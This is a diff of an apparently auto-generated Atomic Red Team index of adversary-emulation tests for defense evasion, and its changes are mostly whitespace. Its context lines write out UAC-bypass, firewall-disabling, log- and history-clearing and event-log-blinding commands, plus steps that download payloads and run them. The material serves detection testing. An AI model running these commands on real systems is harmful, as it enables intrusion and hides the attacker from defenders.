- name: Winlogon Notify Key Logon Persistence - PowerShell
auto_generated_guid: d40da266-e073-4e5a-bb8b-2b385023e5f9
@@ -21596,7 +21596,7 @@ privilege-escalation:
cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
T1547.013:
technique:
@@ -22091,10 +22091,10 @@ defense-evasion:
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
#{local_file}
-'
+ '
cleanup_command: 'del #{local_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Bitsadmin Download (PowerShell)
auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc
@@ -22118,10 +22118,10 @@ defense-evasion:
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
#{local_file}
-'
+ '
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
-'
+ '
name: powershell
- name: Persist, Download, & Execute
auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae
@@ -22159,7 +22159,7 @@ defense-evasion:
bitsadmin.exe /complete #{bits_job_name}
cleanup_command: 'del #{local_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Bits download using desktopimgdownldr.exe (cmd)
auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
@@ -22191,10 +22191,10 @@ defense-evasion:
command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
/eventName:desktopimgdownldr
-'
+ '
cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1
-'
+ '
name: command_prompt
T1027.001:
technique:
@@ -22283,20 +22283,20 @@ defense-evasion:
dependencies:
- description: 'The binary must exist on disk at specified location (#{file_to_pad})
-'
+ '
prereq_command: 'if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'cp /bin/ls #{file_to_pad}
-'
+ '
executor:
command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
-'
+ '
cleanup_command: 'rm #{file_to_pad}
-'
+ '
name: sh
T1542.003:
technique:
@@ -22534,7 +22534,7 @@ defense-evasion:
cmd.exe /c eventvwr.msc
cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
-'
+ '
name: command_prompt
- name: Bypass UAC using Event Viewer (PowerShell)
auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
@@ -22556,7 +22556,7 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
-ErrorAction Ignore
-'
+ '
name: powershell
- name: Bypass UAC using Fodhelper
auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
@@ -22578,7 +22578,7 @@ defense-evasion:
cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
2>&1
-'
+ '
name: command_prompt
- name: Bypass UAC using Fodhelper - PowerShell
auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
@@ -22601,7 +22601,7 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
- name: Bypass UAC using ComputerDefaults (PowerShell)
auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
@@ -22624,7 +22624,7 @@ defense-evasion:
cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
-Recurse -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Bypass UAC by Mocking Trusted Directories
@@ -22672,7 +22672,7 @@ defense-evasion:
cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
-Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Disable UAC using reg.exe
auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
@@ -22685,11 +22685,11 @@ defense-evasion:
command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 0 /f
-'
+ '
cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
/v EnableLUA /t REG_DWORD /d 1 /f
-'
+ '
name: command_prompt
elevation_required: true
- name: Bypass UAC using SilentCleanup task
@@ -22736,7 +22736,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22747,7 +22747,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22772,7 +22772,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22783,7 +22783,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22807,7 +22807,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22818,7 +22818,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22843,7 +22843,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22854,7 +22854,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22878,7 +22878,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22889,7 +22889,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22913,7 +22913,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22924,7 +22924,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22949,7 +22949,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22960,7 +22960,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -22985,7 +22985,7 @@ defense-evasion:
dependencies:
- description: 'UACME executable must exist on disk at specified location (#{uacme_exe})
-'
+ '
prereq_command: |
$tempPath = cmd /c echo #{uacme_exe}
if (Test-Path "$tempPath") {exit 0} else {exit 1}
@@ -22996,7 +22996,7 @@ defense-evasion:
executor:
command: '"#{uacme_exe}"
-'
+ '
cleanup_command: |
powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
@@ -23078,7 +23078,7 @@ defense-evasion:
description: 'Adversaries may supply CMSTP.exe with INF files infected with
malicious commands
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -23090,24 +23090,24 @@ defense-evasion:
dependencies:
- description: 'INF file must exist on disk at specified location (#{inf_file_path})
-'
+ '
prereq_command: 'if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T218.003.inf" -OutFile "#{inf_file_path}"
executor:
command: 'cmstp.exe /s #{inf_file_path}
-'
+ '
name: command_prompt
- name: CMSTP Executing UAC Bypass
auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
description: 'Adversaries may invoke cmd.exe (or other malicious commands) by
embedding them in the RunPreSetupCommandsSection of an INF file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -23119,17 +23119,17 @@ defense-evasion:
dependencies:
- description: 'INF file must exist on disk at specified location (#{inf_file_uac})
-'
+ '
prereq_command: 'if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}"
executor:
command: 'cmstp.exe /s #{inf_file_uac} /au
-'
+ '
name: command_prompt
T1574.012:
technique:
@@ -23240,7 +23240,7 @@ defense-evasion:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -23285,7 +23285,7 @@ defense-evasion:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -23323,7 +23323,7 @@ defense-evasion:
- description: "#{file_name} must be present\n"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -23407,71 +23407,71 @@ defense-evasion:
auto_generated_guid: a934276e-2be5-4a36-93fd-98adbb5bd4fc
description: 'Clears bash history via rm
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'rm ~/.bash_history
-'
+ '
name: sh
- name: Clear Bash history (echo)
auto_generated_guid: cbf506a5-dd78-43e5-be7e-a46b7c7a0a11
description: 'Clears bash history via rm
-'
+ '
supported_platforms:
- linux
executor:
command: 'echo "" > ~/.bash_history
-'
+ '
name: sh
- name: Clear Bash history (cat dev/null)
auto_generated_guid: b1251c35-dcd3-4ea1-86da-36d27b54f31f
description: 'Clears bash history via cat /dev/null
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'cat /dev/null > ~/.bash_history
-'
+ '
name: sh
- name: Clear Bash history (ln dev/null)
auto_generated_guid: 23d348f3-cc5c-4ba9-bd0a-ae09069f0914
description: 'Clears bash history via a symlink to /dev/null
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'ln -sf /dev/null ~/.bash_history
-'
+ '
name: sh
- name: Clear Bash history (truncate)
auto_generated_guid: 47966a1d-df4f-4078-af65-db6d9aa20739
description: 'Clears bash history via truncate
-'
+ '
supported_platforms:
- linux
executor:
command: 'truncate -s0 ~/.bash_history
-'
+ '
name: sh
- name: Clear history of a bunch of shells
auto_generated_guid: 7e6721df-5f08-4370-9255-f06d8a77af4c
description: 'Clears the history of a bunch of different shell types by setting
the history size to zero
-'
+ '
supported_platforms:
- linux
- macos
@@ -23486,7 +23486,7 @@ defense-evasion:
description: 'Clears the history and disable bash history logging of the current
shell and future shell sessions
-'
+ '
supported_platforms:
- linux
- macos
@@ -23506,7 +23506,7 @@ defense-evasion:
description: 'Using a space before a command causes the command to not be logged
in the Bash History file
-'
+ '
supported_platforms:
- linux
- macos
@@ -23521,13 +23521,13 @@ defense-evasion:
keeps the ssh client from catching a proper TTY, which is what usually gets
logged on lastlog
-'
+ '
supported_platforms:
- linux
dependencies:
- description: 'Install sshpass and create user account used for excuting
-'
+ '
prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass
>/dev/null)\n"
get_prereq_command: |
@@ -23537,35 +23537,35 @@ defense-evasion:
executor:
command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname
-'
+ '
cleanup_command: 'userdel -f testuser1
-'
+ '
name: sh
- name: Prevent Powershell History Logging
auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370
description: 'Prevents Powershell history
-'
+ '
supported_platforms:
- windows
executor:
command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing
-'
+ '
name: powershell
cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
- name: Clear Powershell History by Deleting History File
auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037
description: 'Clears Powershell history
-'
+ '
supported_platforms:
- windows
executor:
command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath
-'
+ '
name: powershell
T1070.002:
technique:
@@ -23616,7 +23616,7 @@ defense-evasion:
auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683
description: 'Delete system and audit logs
-'
+ '
supported_platforms:
- macos
- linux
@@ -23632,7 +23632,7 @@ defense-evasion:
This technique was used by threat actor Rocke during the exploitation of Linux
web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -23643,14 +23643,14 @@ defense-evasion:
executor:
command: 'echo 0> /var/spool/mail/#{username}
-'
+ '
name: bash
- name: Overwrite Linux Log
auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5
description: 'This test overwrites the specified log. This technique was used
by threat actor Rocke during the exploitation of Linux web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -23661,7 +23661,7 @@ defense-evasion:
executor:
command: 'echo 0> #{log_path}
-'
+ '
name: bash
T1070.001:
technique:
@@ -23729,7 +23729,7 @@ defense-evasion:
System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is
now empty.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -23740,7 +23740,7 @@ defense-evasion:
executor:
command: 'wevtutil cl #{log_name}
-'
+ '
name: command_prompt
elevation_required: true
- name: Delete System Logs Using Clear-EventLog
@@ -23769,7 +23769,7 @@ defense-evasion:
dependencies:
- description: 'Microsoft Word must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
@@ -23779,7 +23779,7 @@ defense-evasion:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -23853,7 +23853,7 @@ defense-evasion:
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
-'
+ '
supported_platforms:
- google-workspace
- windows
@@ -23888,20 +23888,20 @@ defense-evasion:
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
-'
+ '
dependency_executor_name: gcloud
dependencies:
- description: 'Requires gcloud
-'
+ '
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
-'
+ '
T1553.002:
technique:
object_marking_refs:
@@ -24148,10 +24148,10 @@ defense-evasion:
dependencies:
- description: 'C# file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}"
@@ -24159,10 +24159,10 @@ defense-evasion:
command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file}
#{input_file}
-'
+ '
cleanup_command: 'del #{output_file} >nul 2>&1
-'
+ '
name: command_prompt
- name: Dynamic C# Compile
auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef
@@ -24184,24 +24184,24 @@ defense-evasion:
dependencies:
- description: 'exe file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe
-OutFile #{input_file}
-'
+ '
executor:
command: 'Invoke-Expression #{input_file}
-'
+ '
name: powershell
- name: C compile
auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57
description: 'Compile a c file with either gcc or clang on Linux or Macos.
-'
+ '
supported_platforms:
- linux
- macos
@@ -24214,14 +24214,14 @@ defense-evasion:
dependencies:
- description: 'the source file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if [ -e #{input_file} ]; then exit 0; else exit 1; fi
-'
+ '
get_prereq_command: 'wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c
-O #{input_file}
-'
+ '
executor:
command: |
gcc #{input_file} && ./a.out
@@ -24231,7 +24231,7 @@ defense-evasion:
auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe
description: 'Compile a c file with either gcc or clang on Linux or Macos.
-'
+ '
supported_platforms:
- linux
- macos
@@ -24244,14 +24244,14 @@ defense-evasion:
dependencies:
- description: 'the source file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if [ -e #{input_file} ]; then exit 0; else exit 1; fi
-'
+ '
get_prereq_command: 'wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.cc
-O #{input_file}
-'
+ '
executor:
command: |
g++ #{input_file} && ./a.out
@@ -24261,7 +24261,7 @@ defense-evasion:
auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52
description: 'Compile a c file with either gcc or clang on Linux or Macos.
-'
+ '
supported_platforms:
- linux
- macos
@@ -24274,18 +24274,18 @@ defense-evasion:
dependencies:
- description: 'the source file must exist on disk at specified location (#{input_file})
-'
+ '
prereq_command: 'if [ -e #{input_file} ]; then exit 0; else exit 1; fi
-'
+ '
get_prereq_command: 'wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.go
-O #{input_file}
-'
+ '
executor:
command: 'go run #{input_file}
-'
+ '
name: bash
T1218.001:
technique:
@@ -24365,17 +24365,17 @@ defense-evasion:
dependencies:
- description: 'The payload must exist on disk at specified location (#{local_chm_file})
-'
+ '
prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}"
executor:
command: 'hh.exe #{local_chm_file}
-'
+ '
name: command_prompt
- name: Compiled HTML Help Remote Payload
auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d
@@ -24392,7 +24392,7 @@ defense-evasion:
executor:
command: 'hh.exe #{remote_chm_file}
-'
+ '
name: command_prompt
- name: Invoke CHM with default Shortcut Command Execution
auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
@@ -24418,7 +24418,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath
#{chm_file_path}'
@@ -24451,7 +24451,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler}
-HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
@@ -24476,7 +24476,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
name: powershell
@@ -24517,7 +24517,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler
#{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
@@ -24556,7 +24556,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler
#{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath
@@ -24709,17 +24709,17 @@ defense-evasion:
dependencies:
- description: 'Cpl file must exist on disk at specified location (#{cpl_file_path})
-'
+ '
prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}"
executor:
command: 'control.exe #{cpl_file_path}
-'
+ '
name: command_prompt
T1578.002:
technique:
@@ -25073,10 +25073,10 @@ defense-evasion:
dependencies:
- description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
-'
+ '
prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -25084,7 +25084,7 @@ defense-evasion:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
-'
+ '
name: command_prompt
T1078.001:
technique:
@@ -25204,7 +25204,7 @@ defense-evasion:
description: 'The Adversaries can activate the default Guest user. The guest
account is inactivated by default
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -25215,10 +25215,10 @@ defense-evasion:
executor:
command: 'net user #{guest_user} /active:yes
-'
+ '
cleanup_command: 'net user #{guest_user} /active:no
-'
+ '
name: command_prompt
elevation_required: true
T1578.003:
@@ -25357,7 +25357,7 @@ defense-evasion:
description: 'Rename certutil and decode a file. This is in reference to latest
research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -25380,7 +25380,7 @@ defense-evasion:
description: 'Use Python to decode a base64-encoded text string and echo it
to the console
-'
+ '
supported_platforms:
- linux
- macos
@@ -25396,13 +25396,13 @@ defense-evasion:
dependencies:
- description: 'Python must be present
-'
+ '
prereq_command: 'which python3
-'
+ '
get_prereq_command: 'echo "Please install Python 3"
-'
+ '
executor:
name: sh
elevation_required: false
@@ -25419,7 +25419,7 @@ defense-evasion:
description: 'Use Perl to decode a base64-encoded text string and echo it to
the console
-'
+ '
supported_platforms:
- linux
- macos
@@ -25435,13 +25435,13 @@ defense-evasion:
dependencies:
- description: 'Perl must be present
-'
+ '
prereq_command: 'which perl
-'
+ '
get_prereq_command: 'echo "Please install Perl"
-'
+ '
executor:
name: sh
elevation_required: false
@@ -25455,7 +25455,7 @@ defense-evasion:
description: 'Use common shell utilities to decode a base64-encoded text string
and echo it to the console
-'
+ '
supported_platforms:
- linux
- macos
@@ -25486,7 +25486,7 @@ defense-evasion:
description: 'Use common shell utilities to decode a hex-encoded text string
and echo it to the console
-'
+ '
supported_platforms:
- linux
- macos
@@ -25502,13 +25502,13 @@ defense-evasion:
dependencies:
- description: 'xxd must be present
-'
+ '
prereq_command: 'which xxd
-'
+ '
get_prereq_command: 'echo "Please install xxd"
-'
+ '
executor:
name: sh
elevation_required: false
@@ -25741,7 +25741,7 @@ defense-evasion:
description: 'Creates a new cloudTrail in AWS, Upon successful creation it will
Update,Stop and Delete the cloudTrail
-'
+ '
supported_platforms:
- iaas:aws
input_arguments:
@@ -25760,7 +25760,7 @@ defense-evasion:
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
-'
+ '
prereq_command: |
cat ~/.aws/credentials | grep "default"
aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
@@ -25768,7 +25768,7 @@ defense-evasion:
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
-'
+ '
executor:
command: |
aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}
@@ -25812,14 +25812,14 @@ defense-evasion:
dependencies:
- description: 'Install-Module -Name Az
-'
+ '
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureAD -Force
-'
+ '
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
@@ -25850,7 +25850,7 @@ defense-evasion:
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
-'
+ '
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
@@ -26023,7 +26023,7 @@ defense-evasion:
command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}"
/section:httplogging /dontLog:true
-'
+ '
cleanup_command: |
if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
@@ -26098,16 +26098,16 @@ defense-evasion:
executor:
command: 'wevtutil sl "#{log_name}" /e:false
-'
+ '
cleanup_command: 'wevtutil sl "#{log_name}" /e:true
-'
+ '
name: command_prompt
- name: Makes Eventlog blind with Phant0m
auto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741
description: 'Use [Phant0m](https://github.com/hlldz/Phant0m) to disable Eventlog
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -26119,20 +26119,20 @@ defense-evasion:
dependencies:
- description: 'Phant0m.exe must exist on disk at specified location (#{file_name})
-'
+ '
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing
executor:
command: 'PathToAtomicsFolder\T1562.002\bin\Phant0m.exe
-'
+ '
cleanup_command: 'echo "Sorry you have to reboot"
-'
+ '
name: command_prompt
T1562.007:
technique:
@@ -26232,10 +26232,10 @@ defense-evasion:
executor:
command: 'netsh advfirewall set currentprofile state off
-'
+ '
cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1
-'
+ '
name: command_prompt
- name: Disable Microsoft Defender Firewall via Registry
auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
@@ -26248,11 +26248,11 @@ defense-evasion:
command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
/v "EnableFirewall" /t REG_DWORD /d 0 /f
-'
+ '
cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
/v "EnableFirewall" /t REG_DWORD /d 1 /f
-'
+ '
name: command_prompt
- name: Allow SMB and RDP on Microsoft Defender Firewall
auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
@@ -26267,7 +26267,7 @@ defense-evasion:
netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes
cleanup_command: 'netsh advfirewall reset >nul 2>&1
-'
+ '
name: command_prompt
- name: Opening ports for proxy - HARDRAIN
auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80
@@ -26326,27 +26326,27 @@ defense-evasion:
auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a
description: 'Stop the Uncomplicated Firewall (UFW) if installed.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
